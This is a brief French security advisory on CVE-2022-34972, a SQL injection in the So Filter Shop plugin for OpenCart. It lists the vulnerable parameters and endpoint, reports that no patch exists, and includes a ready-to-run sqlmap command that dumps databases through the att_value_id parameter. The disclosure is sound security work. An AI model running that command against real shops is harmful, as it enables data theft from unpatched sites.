Faille CVE sur le CMS OpenCART plugin So Filter Shop

Opencart est un CMS typé boutique. Il est vulnérable via le plugin so filter shop à une cyberattaque de type SQL INJECTION.

La version v3.x du plugin permet une attaque via les paramètres :

  • att_value_id
  • manu_value_id
  • opt_value_id
  • subcate_value_id

sur l’url /index.php?route=extension/module/so_filter_shop_by/filter_data

Il n’y a pour le moment aucun patch pour combler cette faille CVE

Exemple de commande SQLMAP

				
					sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agent

				
			
Information Valeur

CVE

CVE-2022-34972

CVE publié le

05/07/2022

Score

7.5

Fuite de données

Partielle

Intégrité Système

Partielle

Impact sur les ressources

Partielle

Compléxité

Moyenne

Authentification requise

Non